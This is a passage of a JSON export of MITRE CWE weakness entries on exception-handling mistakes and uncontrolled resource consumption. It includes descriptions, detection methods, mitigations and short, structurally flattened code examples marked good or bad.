Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"395":{"attr":{"@_ID":"395","@_Name":"Use of NullPointerException Catch to Detect NULL Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.","Extended_Description":{"xhtml:p":["Programmers typically catch NullPointerException under three circumstances:","Of these three circumstances, only the last is acceptable."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The program contains a null pointer dereference. Catching the resulting exception was easier than fixing the underlying problem.","The program explicitly throws a NullPointerException to signal an error condition.","The code is part of a test harness that supplies unexpected input to the classes under test."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Framework-based Fuzzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Do not extensively rely on catching exceptions (especially for validating user input) to handle errors. Handling exceptions can decrease the performance of an application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code mistakenly catches a NullPointerException.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (NullPointerException npe) {}","xhtml:div":[{"#text":"mysteryMethod();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":""}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Catching NullPointerException"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR08-J","Entry_Name":"Do not catch NullPointerException or any of its ancestors"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Catch NullPointerException","attr":{"@_Date":"2008-04-11"}}}},"396":{"attr":{"@_ID":"396","@_Name":"Declaration of Catch for Generic Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.","Extended_Description":"Multiple catch blocks can get ugly and repetitive, but \\"condensing\\" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of Java\'s typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt handles three types of exceptions in an identical fashion.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (IOException e) {}catch (InvocationTargetException e) {}catch (SQLException e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"doExchange failed\\", e);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logger.error(\\"doExchange failed\\", e);","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"logger.error(\\"doExchange failed\\", e);","xhtml:br":""}}],"xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"try {}catch (Exception e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"doExchange failed\\", e);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"Body_Text":["At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows:","However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException such as ClassCastException, and NullPointerException, which is not the programmer\'s intent."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Overly-Broad Catch Block"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP5","Entry_Name":"Ambiguous Exception Type"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-396"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-396"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 9: Catching Exceptions.&#34; Page 157"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-396"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-396"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Overly-Broad Catch Block","attr":{"@_Date":"2008-04-11"}}}},"397":{"attr":{"@_ID":"397","@_Name":"Declaration of Throws for Generic Exception","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.","Extended_Description":"Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java\'s exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"221","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Other"],"Impact":["Hide Activities","Alter Execution Logic"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following method throws three types of exceptions.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void doExchange() throws IOException, InvocationTargetException, SQLException {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"public void doExchange() throws Exception {}","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["While it might seem tidier to write","doing so hampers the caller\'s ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement."]},{"Intro_Text":"Early versions of C++ (C++98, C++03, C++11) included a feature known as Dynamic Exception Specification. This allowed functions to declare what type of exceptions it may throw. It is possible to declare a general class of exception to cover any derived exceptions that may be throw.","Example_Code":{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"int myfunction() throw(std::exception) {}","xhtml:div":{"#text":"if (0) throw out_of_range();throw length_error();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"In the example above, the code declares that myfunction() can throw an exception of type \\"std::exception\\" thus hiding details about the possible derived exceptions that could potentially be thrown."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Overly-Broad Throws Declaration"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR07-J","Entry_Name":"Do not throw RuntimeException, Exception, or Throwable"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP5","Entry_Name":"Ambiguous Exception Type"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-397"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-397"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-397"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-397"}}]},"Notes":{"Note":{"#text":"For C++, this weakness only applies to C++98, C++03, and C++11. It relies on a feature known as Dynamic Exception Specification, which was part of early versions of C++ but was deprecated in C++11. It has been removed for C++17 and later.","attr":{"@_Type":"Applicable Platform"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-24","Modification_Comment":"Removed C from Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Overly-Broad Throws Declaration","attr":{"@_Date":"2008-04-11"}}}},"400":{"attr":{"@_ID":"400","@_Name":"Uncontrolled Resource Consumption","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.","Extended_Description":{"xhtml:p":["Limited resources include memory, file system storage, database connection pool entries, and CPU. If an attacker can trigger the allocation of these limited resources, but the number or size of the resources is not controlled, then the attacker could cause a denial of service that consumes all available resources. This would prevent valid users from accessing the software, and it could potentially have an impact on the surrounding environment. For example, a memory exhaustion attack against an application could slow down the application as well as its host operating system.","There are at least three distinct scenarios which can commonly lead to resource exhaustion:","Resource exhaustion problems are often result due to an incorrect implementation of the following situations:"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Lack of throttling for the number of allocated resources","Losing all references to a resource before reaching the shutdown stage","Not closing/returning a resource after processing"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances.","Confusion over which part of the program is responsible for releasing the resource."]}}]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Resource Exhaustion"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"The most common result of resource exhaustion is denial of service. The software may slow down, crash due to unhandled errors, or lock out legitimate users."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"In some cases it may be possible to force the software to \\"fail open\\" in the event of resource exhaustion. The state of the software -- and possibly the security functionality - may then be compromised."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis typically has limited utility in recognizing resource exhaustion problems, except for program-independent system resources such as files, sockets, and processes. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.","Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Certain automated dynamic analysis techniques may be effective in spotting resource exhaustion problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame.","Effectiveness":"Moderate"},{"Method":"Fuzzing","Description":"While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find resource exhaustion problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to handle resource exhaustion may be the cause.","Effectiveness":"Opportunistic"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Mitigation of resource exhaustion attacks requires that the target system either:","The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.","The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["recognizes the attack and denies that user further access for a given amount of time, or","uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed."]}}}},{"Phase":"Architecture and Design","Description":"Ensure that protocols have specific limits of scale placed on them."},{"Phase":"Implementation","Description":"Ensure that all failures in resource allocation place the system into a safe posture."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class Worker implements Executor {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...public void execute(Runnable r) {}public Worker(Channel ch, int nworkers) {}protected void activate() {}","xhtml:br":["","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (InterruptedException ie) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Thread.currentThread().interrupt();","xhtml:br":["",""],"xhtml:i":"// postpone response"}}]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Runnable loop = new Runnable() {};new Thread(loop).start();","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (InterruptedException ie) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"for (;;) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Runnable r = ...;r.run();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}}}]}}}},"Body_Text":"There are no limits to runnables. Potentially an attacker could cause resource problems very quickly."},{"attr":{"@_Demonstrative_Example_ID":"DX-25"},"Intro_Text":"This code allocates a socket and forks each time it receives a new connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {}","xhtml:br":"","xhtml:div":{"#text":"newsock=accept(sock, ...);printf(\\"A connection has been accepted\\\\n\\");pid = fork();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely."},{"attr":{"@_Demonstrative_Example_ID":"DX-50"},"Intro_Text":"In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int writeDataFromSocketToFile(char *host, int port){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port);if (socket &lt; 0) {}if (getNextMessage(socket, filename, FILENAME_SIZE) &gt; 0) {}closeSocket(socket);","xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open socket connection\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (openFileToWrite(filename) &gt; 0) {}closeFile();","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (getNextMessage(socket, buffer, BUFFER_SIZE) &gt; 0){}","xhtml:div":{"#text":"if (!(writeToFile(buffer) &gt; 0))","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}}]}}}},"Body_Text":"This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients\' ability to access the service."},{"attr":{"@_Demonstrative_Example_ID":"DX-51"},"Intro_Text":"In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessage(char **message){}","xhtml:br":["","",""],"xhtml:i":"/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *body;int length = getMessageLength(message[0]);if (length &gt; 0) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"body = &amp;message[1][0];processMessageBody(body);return(SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Unable to process message; invalid message length\\");return(FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"unsigned int length = getMessageLength(message[0]);if ((length &gt; 0) &amp;&amp; (length &lt; MAX_LENGTH)) {...}","xhtml:br":""}}],"Body_Text":["This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check","Also, consider changing the type from \'int\' to \'unsigned int\', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code."]},{"attr":{"@_Demonstrative_Example_ID":"DX-52"},"Intro_Text":"In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void acceptConnections() {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (IOException ex) {...}","xhtml:div":{"#text":"ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {}serverSocket.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + \\":\\" + 